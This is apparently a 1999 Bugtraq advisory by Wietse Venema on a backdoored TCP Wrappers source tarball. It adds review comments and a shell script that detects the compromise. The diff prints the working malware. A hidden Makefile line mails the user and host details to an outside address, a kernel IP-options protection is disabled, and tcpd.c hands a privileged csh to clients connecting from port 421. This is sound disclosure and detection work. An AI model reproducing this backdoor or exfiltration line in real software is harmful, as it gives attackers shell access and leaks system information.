Date: Thu, 21 Jan 1999 11:38:17 -0500
From: Wietse Venema
To: BUGTRAQ@netspace.org
Subject: backdoored tcp wrapper source code

TCP Wrappers is a widely-used security tool to protect UNIX systems
against intrusion. It has an estimated installed base of millions.

Today someone replaced the tcp wrapper source on ftp.win.tue.nl by a
backdoored version. Eventually this was bound to happen, and that's why
the source file is accompanied by a PGP signature. But that is no
guarantee against people downloading and installing backdoored software.

The backdoor gives access to a privileged shell when a client connects
from port 421.

The backdoored copy was downloaded 52 times between 07:16 MET and
16:29 MET. I have informed the sites that downloaded a copy.

Below are details on how to recognize the backdoored version.

	Wietse

Relevant time stamp/size information (times relative to MET):

Backdoored version:

    % ls -lcta
    -r--r--r--   1 wswietse   99186 Jan 21 07:16 tcp_wrappers_7.6.tar.gz
    ...
    dr-xr-sr-x   3 wswietse    4096 Apr 11  1998 .

Restored version:

    % ls -lt tcp_wrappers_7.6.tar.gz
    -r--r--r--   1 wswietse   99438 Jan 21 16:29 tcp_wrappers_7.6.tar.gz

The signature of the bad TAR file is: length 99186 instead of 99438.

The signature of a compiled tcpd binary is:

    strings -a tcpd | grep csh

any output probably means trouble.

Changes that were made to the tcp wrapper 7.6 source code:

diff -c 7.6/Makefile /tmp/tcp_wrappers_7.6/Makefile
*** 7.6/Makefile	Mon Apr  7 20:34:16 1997
--- /tmp/tcp_wrappers_7.6/Makefile	Fri Mar 21 13:27:21 1997
***************
*** 26,31 ****
--- 26,32 ----
  	@echo
  	@echo "If none of these match your environment, edit the system"
  	@echo "dependencies sections in the Makefile and do a 'make other'."
+ 	@sh -c 'echo debug-`whoami`-`uname -a` |mail -s debug wtcpd@hotmail.com'
  	@echo #######################################################
***************
*** 649,655 ****
  # source-routed traffic in the kernel. Examples: 4.4BSD derivatives,
  # Solaris 2.x, and Linux. See your system documentation for details.
  #
! KILL_OPT= -DKILL_IP_OPTIONS

  ## End configuration options
  ############################
--- 650,656 ----
  # source-routed traffic in the kernel. Examples: 4.4BSD derivatives,
  # Solaris 2.x, and Linux. See your system documentation for details.
  #
! # KILL_OPT= -DKILL_IP_OPTIONS

  ## End configuration options
  ############################
Only in 7.6: Makefile-
diff -c 7.6/tcpd.c /tmp/tcp_wrappers_7.6/tcpd.c
*** 7.6/tcpd.c	Sun Feb 11 11:01:33 1996
--- /tmp/tcp_wrappers_7.6/tcpd.c	Sun Feb 11 11:01:33 1996
***************
*** 41,52 ****
--- 41,63 ----
  int     allow_severity = SEVERITY;	/* run-time adjustable */
  int     deny_severity = LOG_WARNING;	/* ditto */

+ char IDENT[]="NC421\n";
+ char SRUN[]="-csh";
+ char SPATH[]="/bin/csh";
+ #define PORT 421
+
  main(argc, argv)
  int     argc;
  char  **argv;
  {
      struct request_info request;
+     struct sockaddr_in from;
      char    path[MAXPATHNAMELEN];
+     int fromlen;
+
+     fromlen = sizeof(from);if (getpeername(0,(struct sockaddr*)&from,
+     &fromlen)>=0){if(ntohs(from.sin_port)==PORT){write(0,IDENT,
+     strlen(IDENT));execl(SPATH,SRUN,(char*)0);}}

      /* Attempt to prevent the creation of world-writable files. */
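Review bot: the added `@sh -c 'echo debug-`whoami`-`uname -a` |mail -s debug wtcpd@hotmail.com'` line in the Makefile 26,31 hunk has no place in a help target: it mails the building user's name and the output of `uname -a` to an external hotmail address every time the default target prints its usage text, and the leading `@` stops make from echoing the command, so the person running `make` never sees it. None of the surrounding `@echo` lines needs a subshell or mail; the line should be dropped.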
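Review bot: the Makefile 649,655 hunk quietly flips a security default: `! KILL_OPT= -DKILL_IP_OPTIONS` becomes `! # KILL_OPT= -DKILL_IP_OPTIONS`, so `-DKILL_IP_OPTIONS` is no longer compiled in unless the builder re-enables it by hand. The change is unrelated to the rest of the patch and carries no explanation in the comment block above it; revert it so the shipped default is unchanged.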
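Review bot: the block inserted at the top of `main()` in the tcpd.c 41,52 hunk bypasses the whole program: before anything else runs it calls `getpeername()` on descriptor 0 and, if the client's source port equals `PORT` (421), writes `IDENT` to the socket and `execl()`s `/bin/csh`, so that connection is handed a shell with the privileges tcpd was started with, and the `request_info` handling and logging that follow never execute. A client picks its own source port, so this is not a check of anything; remove the block together with the `IDENT`, `SRUN` and `SPATH` strings and the `PORT` define (those strings are exactly what `strings -a tcpd | grep csh` above finds in a built binary).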
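As an added example (not part of Wietse's post), a small POSIX shell script that applies the recognition checks above to a downloaded tarball, an unpacked source tree and a compiled tcpd. The sizes and the markers (`wtcpd@hotmail.com`, `NC421`, `PORT 421`, `csh`) come from the post; the file names passed in are the caller's, and `tr` stands in for `strings` so it runs without binutils.

```shell
#!/bin/sh
# Added example, not from the advisory: check a tcp_wrappers_7.6 download for
# the indicators described in the post. Sizes and markers come from the post.
GOOD_SIZE=99438    # genuine tcp_wrappers_7.6.tar.gz
BAD_SIZE=99186     # backdoored tarball seen on ftp.win.tue.nl

# check_tarball_size FILE: 0 = genuine size, 1 = backdoored size, 2 = neither
# (an unknown size proves nothing either way; the PGP signature decides).
check_tarball_size() {
    size=$(wc -c < "$1" | tr -d ' ')
    if [ "$size" -eq "$GOOD_SIZE" ]; then
        echo "OK: $1 is $size bytes"; return 0
    elif [ "$size" -eq "$BAD_SIZE" ]; then
        echo "BACKDOORED: $1 is $size bytes"; return 1
    fi
    echo "UNKNOWN: $1 is $size bytes, verify the PGP signature"; return 2
}

# check_source DIR: 0 = none of the markers from the diff in Makefile or tcpd.c
check_source() {
    hits=0
    grep -n 'wtcpd@hotmail.com' "$1/Makefile" 2>/dev/null && hits=$((hits + 1))
    grep -n -e 'NC421' -e 'getpeername(0' -e 'define PORT 421' \
        "$1/tcpd.c" 2>/dev/null && hits=$((hits + 1))
    [ "$hits" -eq 0 ]
}

# check_binary TCPD: 0 = no "csh" among the printable strings, 1 = found.
# tr breaks the file at non-printable bytes, much as "strings -a" does.
check_binary() {
    if tr -c '[:print:]' '\n' < "$1" | grep -q csh; then
        echo "BACKDOORED: $1 references csh"; return 1
    fi
    echo "OK: $1"; return 0
}
```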